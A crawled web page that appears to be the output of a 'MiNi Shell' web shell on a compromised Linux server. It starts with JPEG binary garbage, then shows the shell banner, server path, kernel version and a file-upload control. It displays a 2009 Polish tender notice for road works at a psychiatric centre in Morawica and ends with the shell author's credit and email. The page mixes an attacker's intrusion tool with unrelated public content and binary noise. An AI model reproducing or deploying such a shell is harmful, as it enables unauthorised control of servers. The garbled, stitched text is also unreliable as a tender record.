JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090804/264868-N-2009.html

<p class="kh_header"><b>Morawica: Wykonanie przebudowy dróg wewnętrznych - odcinek E na terenie Świętokrzyskiego Centrum Psychiatrii w Morawicy</b><br>
<b>Numer ogłoszenia: 264868 - 2009; data zamieszczenia: 04.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Psychiatrii w Morawicy , ul. Spacerowa 5, 26-026 Morawica, woj. świętokrzyskie, tel. 041 3641378, faks 041 3641226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morawica.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy dróg wewnętrznych - odcinek E na terenie Świętokrzyskiego Centrum Psychiatrii w Morawicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie przebudowy dróg wewnętrznych - odcinek E na terenie Świętokrzyskiego Centrum Psychiatrii w Morawicy, ul. Spacerowa 5. Zakres robót budowlanych obejmuje niżej wymienione branże:
1.1 drogowa - przebudowa dróg wewnętrznych - odcinek (etapy budowy) E; 
- roboty przygotowawcze;
- roboty w zakresie budowy dróg o nawierzchni z kostki brukowej Behaton mikro faza (szarej i kolorowej), grubość 8 cm, spełniającej wymagania materiałowe określone w szczegółowej specyfikacji technicznej, która jest częścią składową zał. Nr 1 do SIWZ;
- roboty w zakresie budowy chodników o nawierzchni z kostki brukowej Holland (kolorowej), grubość 6 cm, spełniającej wymagania materiałowe określone w szczegółowej specyfikacji technicznej, która jest częścią składową zał. Nr 1 do SIWZ;
- odwodnienie dróg, parkingów i chodników;
- roboty towarzyszące.
1.2 elektryczna - budowa linii kablowych i napowietrznych oświetlenia terenu - etap 5;  
- roboty w zakresie budowy kablowych linii energetycznych oświetlenia terenu, spełniającej wymagania materiałowe określone w pkt.2 szczegółowej specyfikacji technicznej, która jest częścią składową zał. Nr 1 do SIWZ;
2. Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa stanowiąca integralną część SIWZ w skład, której wchodzą niżej wymienione projekty budowlane i opracowania:
2.1 - projekt budowlany przebudowy dróg wewnętrznych oraz parkingów dla samochodów osobowych na terenie Świętokrzyskiego Centrum Psychiatrii w Morawicy zawierający: projekt zagospodarowania terenu i projekt architektoniczno-budowlany;
2.2 - szczegółowe specyfikacje techniczne (branża drogowa) wykonania i odbioru robót budowlanych przebudowy dróg wewnętrznych na terenie Świętokrzyskiego Centrum Psychiatrii w Morawicy;
2.3   -   projekt   budowlany   przebudowy   oświetlenia   terenu Świętokrzyskiego   Centrum Psychiatrii w Morawicy;
2.4 - szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych budowy kablowych linii energetycznych oświetlenia terenu Świętokrzyskiego Centrum Psychiatrii w Morawicy;
2.5 - przedmiary robót, które obejmują zestawienie przewidywanych robót w kolejności technologicznej ich wykonania i ustaloną ilością jednostek przedmiarowych podzielone na branże jak w pkt.1..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.31.43.00-4, 45.31.61.00-6, 45.23.20.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda złożona oferta musi być zabezpieczona wadium o wartości 5000.00 zł  (pięć tysięcy zł). Wadium należy wnieść najpóźniej do wyznaczonego terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. nie podlegają wykluczeniu z ubiegania się o udzielenie zamówienia publicznego, w tym na podstawie art. 24 ust. 1  i 2 ustawy Pzp;
1.2. spełniają warunki zawarte w art. 22 ust.1 ustawy Pzp, a także określone w SIWZ:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia;
- zapewnią do realizacji zamówienia osoby posiadające przewidziane prawem uprawnienia budowlane do kierowania robotami budowlanymi lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w tym kierownika robót posiadającego uprawnienia budowlane o specjalności drogowej oraz osoby posiadające uprawnienia do nadzorowania wykonywanych robót w branżach instalacji sanitarnych i instalacji elektrycznych, będące członkami właściwej Izby Samorządu Zawodowego;
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- zrealizują cały zakres przedmiotu zamówienia w terminie 2 miesięcy od daty podpisania umowy;
- udzielą 36-miesięcznej gwarancji należytego wykonania całego zakresu robót budowlanych stanowiących przedmiot zamówienia, liczonej od dnia odbioru końcowego;
- udzielą 36-miesięcznej rękojmi za wady fizyczne całego zakresu wykonanych robót budowlanych stanowiących przedmiot zamówienia, liczonej od dnia odbioru końcowego;
- zagwarantują wykonanie całości zamówienia przy założeniu, że zapłata za wykonany przedmiot zamówienia będzie dokonana na podstawie faktur częściowych wystawionych za wykonane i odebrane roboty budowlane oraz fakturą końcową po dokonanym odbiorze końcowym płatnych w ciągu 30 dni od daty doręczenia ich Zamawiającemu;
- zagwarantują wykonanie zamówienia zgodnie z wymaganiami i parametrami technicznymi określonymi w SIWZ w oparciu o materiały dopuszczone do stosowania w budownictwie;
- wniosą wymagane wadium w kwocie 5.000,00 zł (słownie zł: pięć tysięcy) w terminie określonym na składanie ofert i formie opisanej w SIWZ.
2. Ocena spełniania w/w warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale IV SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w.w warunki Wykonawca spełnił. Uzupełnienie wymaganych oświadczeń i dokumentów nie jest możliwe po upływie terminu składania ofert, poza sytuacją określoną w art. 26 ust. 3 ustawy Pzp. Nie spełnienie chociażby jednego z w.w warunków, skutkować będzie wykluczeniem Wykonawcy z postępowania lub odrzuceniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu oferta Wykonawcy musi zawierać następujące dokumenty i oświadczenia:
a) formularz ofertowy sporządzony wg wymaganego wzoru (załącznik nr 2 do SIWZ);
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c) oświadczenie o spełnieniu przez Wykonawcę warunków określonych w art.22 ust.1 Pzp i nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 Pzp (załącznik nr 3 do SIWZ);
d) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
e) aktualne zaświadczenie  właściwego  oddziału  Zakładu  Ubezpieczeń  Społecznych   potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
f) aktualnej informacji z Krajowego Rejestru Karnego albo równoznacznego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Pzp, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy wszystkich urzędujących członków władz uprawnionych do reprezentowania podmiotu gospodarczego);
g) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.9 Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
h) oświadczenie stosowne do wymogów art.36 ust.4 Pzp dotyczące części zamówienia, której wykonanie wykonawca powierzy podwykonawcom (załącznik nr 4 do SIWZ);
i) wykaz osób , którymi dysponuje lub będzie dysponował Wykonawca przewidzianych do kierowania robotami budowlanymi (wg załącznika nr 5 do SIWZ) w niżej wymienionych branżach:
- budowlanej specjalność drogowa,
- sieci i instalacji elektrycznych,
- sieci i instalacji sanitarnych.
j) aktualne dokumenty potwierdzające posiadane uprawnienia budowlane do kierowania  robotami budowlanymi w danej specjalności przez osoby wymienione w ppkt. i);
k) aktualne zaświadczenia o przynależności do właściwej Izby Samorządu Zawodowego przez osoby wymienione w ppkt. i);
l) wykaz wykonanych  przez Wykonawcę robót budowlanych w okresie ostatnich 5 lat przed  dniem  wszczęcia  postępowania,  a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania (wg załącznika nr 6 do SIWZ);
m) dokumenty potwierdzające wykonanie z należytą starannością wszystkich wymienionych w powyższym wykazie zamówień;
n) kosztorysy ofertowe sporządzone metodą kalkulacji szczegółowej wraz z tabelami elementów scalonych oraz zestawieniami materiałów, sprzętu i robocizny z ceną. Kosztorysy ofertowe mają być sporządzone i załączone do oferty w układzie jak w przedmiarach robót wymienionych w rozdz. I pkt.2 ppkt.2.5 SIWZ, aby każdy kosztorys na poszczególne rodzaje robót stanowił odrębny dokument wchodzący w skład oferty;
o) zbiorcze zestawienie kosztorysów ofertowych;
p) dokumenty (pełnomocnictwa) potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
2. Potwierdzeniem spełnienia warunku, jakim jest wniesienie wymaganego wadium będzie dowód wniesienia wadium w kwocie 5.000,00 zł (słownie zł: pięć tysięcy), który należy złożyć zgodnie z zapisami rozdziału VI SIWZ.
3. Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. Dz. U. Nr 87, poz. 605).
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ich oferta musi spełniać następujące wymagania:
- Wykonawcy przedłożą wraz z ofertą oświadczenie określające sposób ich współdziałania, zakres prac przewidzianych do wykonania przez każdego z nich oraz sposób odpowiedzialności;
- Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do  reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Pełnomocnictwo do pełnienia takiej funkcji musi być wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów i musi być złożone wraz z ofertą. Uwaga -treść pełnomocnictwa powinna dokładnie określać zakres umocowania;
- oferta winna zawierać dokumenty wymienione w pkt.1 ppkt b) dla każdego partnera z osobna, pozostałe dokumenty składa pełnomocnik (lider);
- wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem;
- sporządzając formularz ofertowy - w miejscu nazwa i adres Wykonawcy należy wpisać dane wszystkich Wykonawców występujących wspólnie. Inne dokumenty jak również oświadczenia powołujące się na Wykonawcę, w miejscu nazwa i adres Wykonawcy należy wpisać dane ustanowionego pełnomocnika z dokreśleniem w czyim imieniu występuje i na rzecz kogo działa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.morawica.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyskie Centrum Psychiatrii-Dział Zamówień Publicznych i Zaopatrzenia, 26-026 Morawica, ul. Spacerowa 5. Opłata 50.00 PLN - gotówka lub zaliczenie pocztowe..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2009 godzina 10:45, miejsce: Świętokrzyskie Centrum Psychiatrii-Dział Zamówień Publicznych i Zaopatrzenia, 26-026 Morawica, ul. Spacerowa 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com